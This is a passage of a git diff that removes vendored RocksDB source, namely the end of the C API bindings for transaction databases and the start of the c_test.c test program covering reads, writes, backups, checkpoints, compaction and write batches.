-  SaveError(errptr, txn_db->rep->Delete(options->rep, Slice(key, klen)));
-}
-
-void rocksdb_transactiondb_delete_cf(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options,
-    rocksdb_column_family_handle_t* column_family, const char* key,
-    size_t keylen, char** errptr) {
-  SaveError(errptr, txn_db->rep->Delete(options->rep, column_family->rep,
-                                        Slice(key, keylen)));
-}
-
-// Create an iterator inside a transaction
-rocksdb_iterator_t* rocksdb_transaction_create_iterator(
-    rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options) {
-  rocksdb_iterator_t* result = new rocksdb_iterator_t;
-  result->rep = txn->rep->GetIterator(options->rep);
-  return result;
-}
-
-// Create an iterator outside a transaction
-rocksdb_iterator_t* rocksdb_transactiondb_create_iterator(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_readoptions_t* options) {
-  rocksdb_iterator_t* result = new rocksdb_iterator_t;
-  result->rep = txn_db->rep->NewIterator(options->rep);
-  return result;
-}
-
-void rocksdb_transactiondb_close(rocksdb_transactiondb_t* txn_db) {
-  delete txn_db->rep;
-  delete txn_db;
-}
-
-rocksdb_checkpoint_t* rocksdb_transactiondb_checkpoint_object_create(
-    rocksdb_transactiondb_t* txn_db, char** errptr) {
-  Checkpoint* checkpoint;
-  if (SaveError(errptr, Checkpoint::Create(txn_db->rep, &checkpoint))) {
-    return nullptr;
-  }
-  rocksdb_checkpoint_t* result = new rocksdb_checkpoint_t;
-  result->rep = checkpoint;
-  return result;
-}
-
-rocksdb_optimistictransactiondb_t* rocksdb_optimistictransactiondb_open(
-    const rocksdb_options_t* options, const char* name,
-    char** errptr) {
-  OptimisticTransactionDB* otxn_db;
-  if (SaveError(errptr, OptimisticTransactionDB::Open(
-                            options->rep, std::string(name), &otxn_db))) {
-    return nullptr;
-  }
-  rocksdb_optimistictransactiondb_t* result =
-      new rocksdb_optimistictransactiondb_t;
-  result->rep = otxn_db;
-  return result;
-}
-
-rocksdb_transaction_t* rocksdb_optimistictransaction_begin(
-    rocksdb_optimistictransactiondb_t* otxn_db,
-    const rocksdb_writeoptions_t* write_options,
-    const rocksdb_optimistictransaction_options_t* otxn_options,
-    rocksdb_transaction_t* old_txn) {
-  if (old_txn == nullptr) {
-    rocksdb_transaction_t* result = new rocksdb_transaction_t;
-    result->rep = otxn_db->rep->BeginTransaction(write_options->rep,
-                                                 otxn_options->rep, nullptr);
-    return result;
-  }
-  old_txn->rep = otxn_db->rep->BeginTransaction(
-      write_options->rep, otxn_options->rep, old_txn->rep);
-  return old_txn;
-}
-
-void rocksdb_optimistictransactiondb_close(
-    rocksdb_optimistictransactiondb_t* otxn_db) {
-  delete otxn_db->rep;
-  delete otxn_db;
-}
-
-void rocksdb_free(void* ptr) { free(ptr); }
-
-rocksdb_pinnableslice_t* rocksdb_get_pinned(
-    rocksdb_t* db, const rocksdb_readoptions_t* options, const char* key,
-    size_t keylen, char** errptr) {
-  rocksdb_pinnableslice_t* v = new (rocksdb_pinnableslice_t);
-  Status s = db->rep->Get(options->rep, db->rep->DefaultColumnFamily(),
-                          Slice(key, keylen), &v->rep);
-  if (!s.ok()) {
-    delete (v);
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-    return NULL;
-  }
-  return v;
-}
-
-rocksdb_pinnableslice_t* rocksdb_get_pinned_cf(
-    rocksdb_t* db, const rocksdb_readoptions_t* options,
-    rocksdb_column_family_handle_t* column_family, const char* key,
-    size_t keylen, char** errptr) {
-  rocksdb_pinnableslice_t* v = new (rocksdb_pinnableslice_t);
-  Status s = db->rep->Get(options->rep, column_family->rep, Slice(key, keylen),
-                          &v->rep);
-  if (!s.ok()) {
-    delete v;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-    return NULL;
-  }
-  return v;
-}
-
-void rocksdb_pinnableslice_destroy(rocksdb_pinnableslice_t* v) { delete v; }
-
-const char* rocksdb_pinnableslice_value(const rocksdb_pinnableslice_t* v,
-                                        size_t* vlen) {
-  if (!v) {
-    *vlen = 0;
-    return NULL;
-  }
-
-  *vlen = v->rep.size();
-  return v->rep.data();
-}
-}  // end extern "C"
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/c_test.c b/thirdparty/rocksdb/db/c_test.c
deleted file mode 100644
index 7b76bad..0000000
--- a/thirdparty/rocksdb/db/c_test.c
+++ /dev/null
@@ -1,1529 +0,0 @@
-/* Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-   Use of this source code is governed by a BSD-style license that can be
-   found in the LICENSE file. See the AUTHORS file for names of contributors. */
-
-#include <stdio.h>
-
-#ifndef ROCKSDB_LITE  // Lite does not support C API
-
-#include "rocksdb/c.h"
-
-#include <stddef.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/types.h>
-#ifndef OS_WIN
-#include <unistd.h>
-#endif
-#include <inttypes.h>
-
-// Can not use port/port.h macros as this is a c file
-#ifdef OS_WIN
-
-#include <windows.h>
-
-#define snprintf _snprintf
-
-// Ok for uniqueness
-int geteuid() {
-  int result = 0;
-
-  result = ((int)GetCurrentProcessId() << 16);
-  result |= (int)GetCurrentThreadId();
-
-  return result;
-}
-
-#endif
-
-const char* phase = "";
-static char dbname[200];
-static char sstfilename[200];
-static char dbbackupname[200];
-static char dbcheckpointname[200];
-static char dbpathname[200];
-
-static void StartPhase(const char* name) {
-  fprintf(stderr, "=== Test %s\n", name);
-  phase = name;
-}
-static const char* GetTempDir(void) {
-    const char* ret = getenv("TEST_TMPDIR");
-    if (ret == NULL || ret[0] == '\0')
-        ret = "/tmp";
-    return ret;
-}
-
-#define CheckNoError(err)                                               \
-  if ((err) != NULL) {                                                  \
-    fprintf(stderr, "%s:%d: %s: %s\n", __FILE__, __LINE__, phase, (err)); \
-    abort();                                                            \
-  }
-
-#define CheckCondition(cond)                                            \
-  if (!(cond)) {                                                        \
-    fprintf(stderr, "%s:%d: %s: %s\n", __FILE__, __LINE__, phase, #cond); \
-    abort();                                                            \
-  }
-
-static void CheckEqual(const char* expected, const char* v, size_t n) {
-  if (expected == NULL && v == NULL) {
-    // ok
-  } else if (expected != NULL && v != NULL && n == strlen(expected) &&
-             memcmp(expected, v, n) == 0) {
-    // ok
-    return;
-  } else {
-    fprintf(stderr, "%s: expected '%s', got '%s'\n",
-            phase,
-            (expected ? expected : "(null)"),
-            (v ? v : "(null"));
-    abort();
-  }
-}
-
-static void Free(char** ptr) {
-  if (*ptr) {
-    free(*ptr);
-    *ptr = NULL;
-  }
-}
-
-static void CheckValue(
-    char* err,
-    const char* expected,
-    char** actual,
-    size_t actual_length) {
-  CheckNoError(err);
-  CheckEqual(expected, *actual, actual_length);
-  Free(actual);
-}
-
-static void CheckGet(
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options,
-    const char* key,
-    const char* expected) {
-  char* err = NULL;
-  size_t val_len;
-  char* val;
-  val = rocksdb_get(db, options, key, strlen(key), &val_len, &err);
-  CheckNoError(err);
-  CheckEqual(expected, val, val_len);
-  Free(&val);
-}
-
-static void CheckGetCF(
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options,
-    rocksdb_column_family_handle_t* handle,
-    const char* key,
-    const char* expected) {
-  char* err = NULL;
-  size_t val_len;
-  char* val;
-  val = rocksdb_get_cf(db, options, handle, key, strlen(key), &val_len, &err);
-  CheckNoError(err);
-  CheckEqual(expected, val, val_len);
-  Free(&val);
-}
-
-static void CheckPinGet(rocksdb_t* db, const rocksdb_readoptions_t* options,
-                        const char* key, const char* expected) {
-  char* err = NULL;
-  size_t val_len;
-  const char* val;
-  rocksdb_pinnableslice_t* p;
-  p = rocksdb_get_pinned(db, options, key, strlen(key), &err);
-  CheckNoError(err);
-  val = rocksdb_pinnableslice_value(p, &val_len);
-  CheckEqual(expected, val, val_len);
-  rocksdb_pinnableslice_destroy(p);
-}
-
-static void CheckPinGetCF(rocksdb_t* db, const rocksdb_readoptions_t* options,
-                          rocksdb_column_family_handle_t* handle,
-                          const char* key, const char* expected) {
-  char* err = NULL;
-  size_t val_len;
-  const char* val;
-  rocksdb_pinnableslice_t* p;
-  p = rocksdb_get_pinned_cf(db, options, handle, key, strlen(key), &err);
-  CheckNoError(err);
-  val = rocksdb_pinnableslice_value(p, &val_len);
-  CheckEqual(expected, val, val_len);
-  rocksdb_pinnableslice_destroy(p);
-}
-
-static void CheckIter(rocksdb_iterator_t* iter,
-                      const char* key, const char* val) {
-  size_t len;
-  const char* str;
-  str = rocksdb_iter_key(iter, &len);
-  CheckEqual(key, str, len);
-  str = rocksdb_iter_value(iter, &len);
-  CheckEqual(val, str, len);
-}
-
-// Callback from rocksdb_writebatch_iterate()
-static void CheckPut(void* ptr,
-                     const char* k, size_t klen,
-                     const char* v, size_t vlen) {
-  int* state = (int*) ptr;
-  CheckCondition(*state < 2);
-  switch (*state) {
-    case 0:
-      CheckEqual("bar", k, klen);
-      CheckEqual("b", v, vlen);
-      break;
-    case 1:
-      CheckEqual("box", k, klen);
-      CheckEqual("c", v, vlen);
-      break;
-  }
-  (*state)++;
-}
-
-// Callback from rocksdb_writebatch_iterate()
-static void CheckDel(void* ptr, const char* k, size_t klen) {
-  int* state = (int*) ptr;
-  CheckCondition(*state == 2);
-  CheckEqual("bar", k, klen);
-  (*state)++;
-}
-
-static void CmpDestroy(void* arg) { }
-
-static int CmpCompare(void* arg, const char* a, size_t alen,
-                      const char* b, size_t blen) {
-  size_t n = (alen < blen) ? alen : blen;
-  int r = memcmp(a, b, n);
-  if (r == 0) {
-    if (alen < blen) r = -1;
-    else if (alen > blen) r = +1;
-  }
-  return r;
-}
-
-static const char* CmpName(void* arg) {
-  return "foo";
-}
-
-// Custom filter policy
-static unsigned char fake_filter_result = 1;
-static void FilterDestroy(void* arg) { }
-static const char* FilterName(void* arg) {
-  return "TestFilter";
-}
-static char* FilterCreate(
-    void* arg,
-    const char* const* key_array, const size_t* key_length_array,
-    int num_keys,
-    size_t* filter_length) {
-  *filter_length = 4;
-  char* result = malloc(4);
-  memcpy(result, "fake", 4);
-  return result;
-}
-static unsigned char FilterKeyMatch(
-    void* arg,
-    const char* key, size_t length,
-    const char* filter, size_t filter_length) {
-  CheckCondition(filter_length == 4);
-  CheckCondition(memcmp(filter, "fake", 4) == 0);
-  return fake_filter_result;
-}
-
-// Custom compaction filter
-static void CFilterDestroy(void* arg) {}
-static const char* CFilterName(void* arg) { return "foo"; }
-static unsigned char CFilterFilter(void* arg, int level, const char* key,
-                                   size_t key_length,
-                                   const char* existing_value,
-                                   size_t value_length, char** new_value,
-                                   size_t* new_value_length,
-                                   unsigned char* value_changed) {
-  if (key_length == 3) {
-    if (memcmp(key, "bar", key_length) == 0) {
-      return 1;
-    } else if (memcmp(key, "baz", key_length) == 0) {
-      *value_changed = 1;
-      *new_value = "newbazvalue";
-      *new_value_length = 11;
-      return 0;
-    }
-  }
-  return 0;
-}
-
-static void CFilterFactoryDestroy(void* arg) {}
-static const char* CFilterFactoryName(void* arg) { return "foo"; }
-static rocksdb_compactionfilter_t* CFilterCreate(
-    void* arg, rocksdb_compactionfiltercontext_t* context) {
-  return rocksdb_compactionfilter_create(NULL, CFilterDestroy, CFilterFilter,
-                                         CFilterName);
-}
-
-static rocksdb_t* CheckCompaction(rocksdb_t* db, rocksdb_options_t* options,
-                                  rocksdb_readoptions_t* roptions,
-                                  rocksdb_writeoptions_t* woptions) {
-  char* err = NULL;
-  db = rocksdb_open(options, dbname, &err);
-  CheckNoError(err);
-  rocksdb_put(db, woptions, "foo", 3, "foovalue", 8, &err);
-  CheckNoError(err);
-  CheckGet(db, roptions, "foo", "foovalue");
-  rocksdb_put(db, woptions, "bar", 3, "barvalue", 8, &err);
-  CheckNoError(err);
-  CheckGet(db, roptions, "bar", "barvalue");
-  rocksdb_put(db, woptions, "baz", 3, "bazvalue", 8, &err);
-  CheckNoError(err);
-  CheckGet(db, roptions, "baz", "bazvalue");
-
-  // Force compaction
-  rocksdb_compact_range(db, NULL, 0, NULL, 0);
-  // should have filtered bar, but not foo
-  CheckGet(db, roptions, "foo", "foovalue");
-  CheckGet(db, roptions, "bar", NULL);
-  CheckGet(db, roptions, "baz", "newbazvalue");
-  return db;
-}
-
-// Custom merge operator
-static void MergeOperatorDestroy(void* arg) { }
-static const char* MergeOperatorName(void* arg) {
-  return "TestMergeOperator";
-}
-static char* MergeOperatorFullMerge(
-    void* arg,
-    const char* key, size_t key_length,
-    const char* existing_value, size_t existing_value_length,
-    const char* const* operands_list, const size_t* operands_list_length,
-    int num_operands,
-    unsigned char* success, size_t* new_value_length) {
-  *new_value_length = 4;
-  *success = 1;
-  char* result = malloc(4);
-  memcpy(result, "fake", 4);
-  return result;
-}
-static char* MergeOperatorPartialMerge(
-    void* arg,
-    const char* key, size_t key_length,
-    const char* const* operands_list, const size_t* operands_list_length,
-    int num_operands,
-    unsigned char* success, size_t* new_value_length) {
-  *new_value_length = 4;
-  *success = 1;
-  char* result = malloc(4);
-  memcpy(result, "fake", 4);
-  return result;
-}
-
-static void CheckTxnGet(
-        rocksdb_transaction_t* txn,
-        const rocksdb_readoptions_t* options,
-        const char* key,
-        const char* expected) {
-        char* err = NULL;
-        size_t val_len;
-        char* val;
-        val = rocksdb_transaction_get(txn, options, key, strlen(key), &val_len, &err);
-        CheckNoError(err);
-        CheckEqual(expected, val, val_len);
-        Free(&val);
-}
-
-static void CheckTxnDBGet(
-        rocksdb_transactiondb_t* txn_db,
-        const rocksdb_readoptions_t* options,
-        const char* key,
-        const char* expected) {
-        char* err = NULL;
-        size_t val_len;
-        char* val;
-        val = rocksdb_transactiondb_get(txn_db, options, key, strlen(key), &val_len, &err);
-        CheckNoError(err);
-        CheckEqual(expected, val, val_len);
-        Free(&val);
-}
-
-static void CheckTxnDBGetCF(rocksdb_transactiondb_t* txn_db,
-                            const rocksdb_readoptions_t* options,
-                            rocksdb_column_family_handle_t* column_family,
-                            const char* key, const char* expected) {
-  char* err = NULL;
-  size_t val_len;
-  char* val;
-  val = rocksdb_transactiondb_get_cf(txn_db, options, column_family, key,
-                                     strlen(key), &val_len, &err);
-  CheckNoError(err);
-  CheckEqual(expected, val, val_len);
-  Free(&val);
-}
-
-int main(int argc, char** argv) {
-  rocksdb_t* db;
-  rocksdb_comparator_t* cmp;
-  rocksdb_cache_t* cache;
-  rocksdb_dbpath_t *dbpath;
-  rocksdb_env_t* env;
-  rocksdb_options_t* options;
-  rocksdb_compactoptions_t* coptions;
-  rocksdb_block_based_table_options_t* table_options;
-  rocksdb_readoptions_t* roptions;
-  rocksdb_writeoptions_t* woptions;
-  rocksdb_ratelimiter_t* rate_limiter;
-  rocksdb_transactiondb_t* txn_db;
-  rocksdb_transactiondb_options_t* txn_db_options;
-  rocksdb_transaction_t* txn;
-  rocksdb_transaction_options_t* txn_options;
-  char* err = NULL;
-  int run = -1;
-
-  snprintf(dbname, sizeof(dbname),
-           "%s/rocksdb_c_test-%d",
-           GetTempDir(),
-           ((int) geteuid()));
-
-  snprintf(dbbackupname, sizeof(dbbackupname),
-           "%s/rocksdb_c_test-%d-backup",
-           GetTempDir(),
-           ((int) geteuid()));
-
-  snprintf(dbcheckpointname, sizeof(dbcheckpointname),
-           "%s/rocksdb_c_test-%d-checkpoint",
-           GetTempDir(),
-           ((int) geteuid()));
-
-  snprintf(sstfilename, sizeof(sstfilename),
-           "%s/rocksdb_c_test-%d-sst",
-           GetTempDir(),
-           ((int)geteuid()));
-
-  snprintf(dbpathname, sizeof(dbpathname),
-           "%s/rocksdb_c_test-%d-dbpath",
-           GetTempDir(),
-           ((int) geteuid()));
-
-  StartPhase("create_objects");
-  cmp = rocksdb_comparator_create(NULL, CmpDestroy, CmpCompare, CmpName);
-  dbpath = rocksdb_dbpath_create(dbpathname, 1024 * 1024);
-  env = rocksdb_create_default_env();
-  cache = rocksdb_cache_create_lru(100000);
-
-  options = rocksdb_options_create();
-  rocksdb_options_set_comparator(options, cmp);
-  rocksdb_options_set_error_if_exists(options, 1);
-  rocksdb_options_set_env(options, env);
-  rocksdb_options_set_info_log(options, NULL);
-  rocksdb_options_set_write_buffer_size(options, 100000);
-  rocksdb_options_set_paranoid_checks(options, 1);
-  rocksdb_options_set_max_open_files(options, 10);
-  rocksdb_options_set_base_background_compactions(options, 1);
-  table_options = rocksdb_block_based_options_create();
-  rocksdb_block_based_options_set_block_cache(table_options, cache);
-  rocksdb_options_set_block_based_table_factory(options, table_options);
-
-  rocksdb_options_set_compression(options, rocksdb_no_compression);
-  rocksdb_options_set_compression_options(options, -14, -1, 0, 0);
-  int compression_levels[] = {rocksdb_no_compression, rocksdb_no_compression,
-                              rocksdb_no_compression, rocksdb_no_compression};
-  rocksdb_options_set_compression_per_level(options, compression_levels, 4);
-  rate_limiter = rocksdb_ratelimiter_create(1000 * 1024 * 1024, 100 * 1000, 10);
-  rocksdb_options_set_ratelimiter(options, rate_limiter);
-  rocksdb_ratelimiter_destroy(rate_limiter);
-
-  roptions = rocksdb_readoptions_create();
-  rocksdb_readoptions_set_verify_checksums(roptions, 1);
-  rocksdb_readoptions_set_fill_cache(roptions, 1);
-
-  woptions = rocksdb_writeoptions_create();
-  rocksdb_writeoptions_set_sync(woptions, 1);
-
-  coptions = rocksdb_compactoptions_create();
-  rocksdb_compactoptions_set_exclusive_manual_compaction(coptions, 1);
-
-  StartPhase("destroy");
-  rocksdb_destroy_db(options, dbname, &err);
-  Free(&err);
-
-  StartPhase("open_error");
-  rocksdb_open(options, dbname, &err);
-  CheckCondition(err != NULL);
-  Free(&err);
-
-  StartPhase("open");
-  rocksdb_options_set_create_if_missing(options, 1);
-  db = rocksdb_open(options, dbname, &err);
-  CheckNoError(err);
-  CheckGet(db, roptions, "foo", NULL);
-
-  StartPhase("put");
-  rocksdb_put(db, woptions, "foo", 3, "hello", 5, &err);
-  CheckNoError(err);
-  CheckGet(db, roptions, "foo", "hello");
-
-  StartPhase("backup_and_restore");
-  {
-    rocksdb_destroy_db(options, dbbackupname, &err);
-    CheckNoError(err);
-
-    rocksdb_backup_engine_t *be = rocksdb_backup_engine_open(options, dbbackupname, &err);
-    CheckNoError(err);
-
-    rocksdb_backup_engine_create_new_backup(be, db, &err);
-    CheckNoError(err);
-
-    // need a change to trigger a new backup
-    rocksdb_delete(db, woptions, "does-not-exist", 14, &err);
-    CheckNoError(err);
-
-    rocksdb_backup_engine_create_new_backup(be, db, &err);
-    CheckNoError(err);
-
-    const rocksdb_backup_engine_info_t* bei = rocksdb_backup_engine_get_backup_info(be);
-    CheckCondition(rocksdb_backup_engine_info_count(bei) > 1);
-    rocksdb_backup_engine_info_destroy(bei);
-
-    rocksdb_backup_engine_purge_old_backups(be, 1, &err);
-    CheckNoError(err);
-
-    bei = rocksdb_backup_engine_get_backup_info(be);
-    CheckCondition(rocksdb_backup_engine_info_count(bei) == 1);
-    rocksdb_backup_engine_info_destroy(bei);
-
-    rocksdb_delete(db, woptions, "foo", 3, &err);
-    CheckNoError(err);
-
-    rocksdb_close(db);
-
-    rocksdb_destroy_db(options, dbname, &err);
-    CheckNoError(err);
-
-    rocksdb_restore_options_t *restore_options = rocksdb_restore_options_create();
-    rocksdb_restore_options_set_keep_log_files(restore_options, 0);
-    rocksdb_backup_engine_restore_db_from_latest_backup(be, dbname, dbname, restore_options, &err);
-    CheckNoError(err);
-    rocksdb_restore_options_destroy(restore_options);
-
-    rocksdb_options_set_error_if_exists(options, 0);
-    db = rocksdb_open(options, dbname, &err);
-    CheckNoError(err);
-    rocksdb_options_set_error_if_exists(options, 1);
-
-    CheckGet(db, roptions, "foo", "hello");
-
-    rocksdb_backup_engine_close(be);
-  }
-
-  StartPhase("checkpoint");
-  {
-    rocksdb_destroy_db(options, dbcheckpointname, &err);
-    CheckNoError(err);
-
-    rocksdb_checkpoint_t* checkpoint = rocksdb_checkpoint_object_create(db, &err);
-    CheckNoError(err);
-
-    rocksdb_checkpoint_create(checkpoint, dbcheckpointname, 0, &err);
-    CheckNoError(err);
-
-    // start a new database from the checkpoint
-    rocksdb_close(db);
-    rocksdb_options_set_error_if_exists(options, 0);
-    db = rocksdb_open(options, dbcheckpointname, &err);
-    CheckNoError(err);
-
-    CheckGet(db, roptions, "foo", "hello");
-
-    rocksdb_checkpoint_object_destroy(checkpoint);
-
-    rocksdb_close(db);
-    rocksdb_destroy_db(options, dbcheckpointname, &err);
-    CheckNoError(err);
-
-    db = rocksdb_open(options, dbname, &err);
-    CheckNoError(err);
-    rocksdb_options_set_error_if_exists(options, 1);
-  }
-
-  StartPhase("compactall");
-  rocksdb_compact_range(db, NULL, 0, NULL, 0);
-  CheckGet(db, roptions, "foo", "hello");
-
-  StartPhase("compactrange");
-  rocksdb_compact_range(db, "a", 1, "z", 1);
-  CheckGet(db, roptions, "foo", "hello");
-
-  StartPhase("compactallopt");
-  rocksdb_compact_range_opt(db, coptions, NULL, 0, NULL, 0);
-  CheckGet(db, roptions, "foo", "hello");
-
-  StartPhase("compactrangeopt");
-  rocksdb_compact_range_opt(db, coptions, "a", 1, "z", 1);
-  CheckGet(db, roptions, "foo", "hello");
-
-  // Simple check cache usage
-  StartPhase("cache_usage");
-  {
-    rocksdb_readoptions_set_pin_data(roptions, 1);
-    rocksdb_iterator_t* iter = rocksdb_create_iterator(db, roptions);
-    rocksdb_iter_seek(iter, "foo", 3);
-
-    size_t usage = rocksdb_cache_get_usage(cache);
-    CheckCondition(usage > 0);
-
-    size_t pin_usage = rocksdb_cache_get_pinned_usage(cache);
-    CheckCondition(pin_usage > 0);
-
-    rocksdb_iter_next(iter);
-    rocksdb_iter_destroy(iter);
-    rocksdb_readoptions_set_pin_data(roptions, 0);
-  }
-
-  StartPhase("addfile");
-  {
-    rocksdb_envoptions_t* env_opt = rocksdb_envoptions_create();
-    rocksdb_options_t* io_options = rocksdb_options_create();
-    rocksdb_sstfilewriter_t* writer =
-        rocksdb_sstfilewriter_create(env_opt, io_options);
-
-    unlink(sstfilename);
-    rocksdb_sstfilewriter_open(writer, sstfilename, &err);
-    CheckNoError(err);
-    rocksdb_sstfilewriter_put(writer, "sstk1", 5, "v1", 2, &err);
-    CheckNoError(err);
-    rocksdb_sstfilewriter_put(writer, "sstk2", 5, "v2", 2, &err);
-    CheckNoError(err);
-    rocksdb_sstfilewriter_put(writer, "sstk3", 5, "v3", 2, &err);
-    CheckNoError(err);
-    rocksdb_sstfilewriter_finish(writer, &err);
-    CheckNoError(err);
-
-    rocksdb_ingestexternalfileoptions_t* ing_opt =
-        rocksdb_ingestexternalfileoptions_create();
-    const char* file_list[1] = {sstfilename};
-    rocksdb_ingest_external_file(db, file_list, 1, ing_opt, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "sstk1", "v1");
-    CheckGet(db, roptions, "sstk2", "v2");
-    CheckGet(db, roptions, "sstk3", "v3");
-
-    unlink(sstfilename);
-    rocksdb_sstfilewriter_open(writer, sstfilename, &err);
-    CheckNoError(err);
-    rocksdb_sstfilewriter_put(writer, "sstk2", 5, "v4", 2, &err);
-    CheckNoError(err);
-    rocksdb_sstfilewriter_put(writer, "sstk22", 6, "v5", 2, &err);
-    CheckNoError(err);
-    rocksdb_sstfilewriter_put(writer, "sstk3", 5, "v6", 2, &err);
-    CheckNoError(err);
-    rocksdb_sstfilewriter_finish(writer, &err);
-    CheckNoError(err);
-
-    rocksdb_ingest_external_file(db, file_list, 1, ing_opt, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "sstk1", "v1");
-    CheckGet(db, roptions, "sstk2", "v4");
-    CheckGet(db, roptions, "sstk22", "v5");
-    CheckGet(db, roptions, "sstk3", "v6");
-
-    rocksdb_ingestexternalfileoptions_destroy(ing_opt);
-    rocksdb_sstfilewriter_destroy(writer);
-    rocksdb_options_destroy(io_options);
-    rocksdb_envoptions_destroy(env_opt);
-
-    // Delete all keys we just ingested
-    rocksdb_delete(db, woptions, "sstk1", 5, &err);
-    CheckNoError(err);
-    rocksdb_delete(db, woptions, "sstk2", 5, &err);
-    CheckNoError(err);
-    rocksdb_delete(db, woptions, "sstk22", 6, &err);
-    CheckNoError(err);
-    rocksdb_delete(db, woptions, "sstk3", 5, &err);
-    CheckNoError(err);
-  }
-
-  StartPhase("writebatch");
-  {
-    rocksdb_writebatch_t* wb = rocksdb_writebatch_create();
-    rocksdb_writebatch_put(wb, "foo", 3, "a", 1);
-    rocksdb_writebatch_clear(wb);
-    rocksdb_writebatch_put(wb, "bar", 3, "b", 1);
-    rocksdb_writebatch_put(wb, "box", 3, "c", 1);
-    rocksdb_writebatch_delete(wb, "bar", 3);
-    rocksdb_write(db, woptions, wb, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "foo", "hello");
-    CheckGet(db, roptions, "bar", NULL);
-    CheckGet(db, roptions, "box", "c");
-    int pos = 0;
-    rocksdb_writebatch_iterate(wb, &pos, CheckPut, CheckDel);
-    CheckCondition(pos == 3);
-    rocksdb_writebatch_clear(wb);
-    rocksdb_writebatch_put(wb, "bar", 3, "b", 1);
-    rocksdb_writebatch_put(wb, "bay", 3, "d", 1);
-    rocksdb_writebatch_delete_range(wb, "bar", 3, "bay", 3);
-    rocksdb_write(db, woptions, wb, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "bar", NULL);
-    CheckGet(db, roptions, "bay", "d");
-    rocksdb_writebatch_clear(wb);
-    const char* start_list[1] = {"bay"};
-    const size_t start_sizes[1] = {3};
-    const char* end_list[1] = {"baz"};
-    const size_t end_sizes[1] = {3};
-    rocksdb_writebatch_delete_rangev(wb, 1, start_list, start_sizes, end_list,
-                                     end_sizes);
-    rocksdb_write(db, woptions, wb, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "bay", NULL);
-    rocksdb_writebatch_destroy(wb);
-  }
-
-  StartPhase("writebatch_vectors");
-  {
-    rocksdb_writebatch_t* wb = rocksdb_writebatch_create();
-    const char* k_list[2] = { "z", "ap" };
-    const size_t k_sizes[2] = { 1, 2 };
-    const char* v_list[3] = { "x", "y", "z" };
-    const size_t v_sizes[3] = { 1, 1, 1 };
-    rocksdb_writebatch_putv(wb, 2, k_list, k_sizes, 3, v_list, v_sizes);
-    rocksdb_write(db, woptions, wb, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "zap", "xyz");
-    rocksdb_writebatch_delete(wb, "zap", 3);
-    rocksdb_write(db, woptions, wb, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "zap", NULL);
-    rocksdb_writebatch_destroy(wb);
-  }
-
-  StartPhase("writebatch_savepoint");
-  {
-    rocksdb_writebatch_t* wb = rocksdb_writebatch_create();
-    rocksdb_writebatch_set_save_point(wb);
-    rocksdb_writebatch_set_save_point(wb);
-    const char* k_list[2] = {"z", "ap"};
-    const size_t k_sizes[2] = {1, 2};
-    const char* v_list[3] = {"x", "y", "z"};
-    const size_t v_sizes[3] = {1, 1, 1};
-    rocksdb_writebatch_pop_save_point(wb, &err);
-    CheckNoError(err);
-    rocksdb_writebatch_putv(wb, 2, k_list, k_sizes, 3, v_list, v_sizes);
-    rocksdb_writebatch_rollback_to_save_point(wb, &err);
-    CheckNoError(err);
-    rocksdb_write(db, woptions, wb, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "zap", NULL);
-    rocksdb_writebatch_destroy(wb);
-  }
-
-  StartPhase("writebatch_rep");
-  {
-    rocksdb_writebatch_t* wb1 = rocksdb_writebatch_create();
-    rocksdb_writebatch_put(wb1, "baz", 3, "d", 1);
-    rocksdb_writebatch_put(wb1, "quux", 4, "e", 1);
-    rocksdb_writebatch_delete(wb1, "quux", 4);
-    size_t repsize1 = 0;
-    const char* rep = rocksdb_writebatch_data(wb1, &repsize1);
-    rocksdb_writebatch_t* wb2 = rocksdb_writebatch_create_from(rep, repsize1);
-    CheckCondition(rocksdb_writebatch_count(wb1) ==
-                   rocksdb_writebatch_count(wb2));
-    size_t repsize2 = 0;
-    CheckCondition(
-        memcmp(rep, rocksdb_writebatch_data(wb2, &repsize2), repsize1) == 0);
-    rocksdb_writebatch_destroy(wb1);
-    rocksdb_writebatch_destroy(wb2);
-  }
-
-  StartPhase("writebatch_wi");
-  {
-    rocksdb_writebatch_wi_t* wbi = rocksdb_writebatch_wi_create(0, 1);
-    rocksdb_writebatch_wi_put(wbi, "foo", 3, "a", 1);
-    rocksdb_writebatch_wi_clear(wbi);
-    rocksdb_writebatch_wi_put(wbi, "bar", 3, "b", 1);
-    rocksdb_writebatch_wi_put(wbi, "box", 3, "c", 1);
-    rocksdb_writebatch_wi_delete(wbi, "bar", 3);
-    int count = rocksdb_writebatch_wi_count(wbi);
-    CheckCondition(count == 3);
-    size_t size;
-    char* value;
-    value = rocksdb_writebatch_wi_get_from_batch(wbi, options, "box", 3, &size, &err);
-    CheckValue(err, "c", &value, size);
-    value = rocksdb_writebatch_wi_get_from_batch(wbi, options, "bar", 3, &size, &err);
-    CheckValue(err, NULL, &value, size);
-    value = rocksdb_writebatch_wi_get_from_batch_and_db(wbi, db, roptions, "foo", 3, &size, &err);
-    CheckValue(err, "hello", &value, size);
-    value = rocksdb_writebatch_wi_get_from_batch_and_db(wbi, db, roptions, "box", 3, &size, &err);
-    CheckValue(err, "c", &value, size);
-    rocksdb_write_writebatch_wi(db, woptions, wbi, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "foo", "hello");
-    CheckGet(db, roptions, "bar", NULL);
-    CheckGet(db, roptions, "box", "c");
-    int pos = 0;
-    rocksdb_writebatch_wi_iterate(wbi, &pos, CheckPut, CheckDel);
-    CheckCondition(pos == 3);
-    rocksdb_writebatch_wi_clear(wbi);
-    rocksdb_writebatch_wi_put(wbi, "bar", 3, "b", 1);
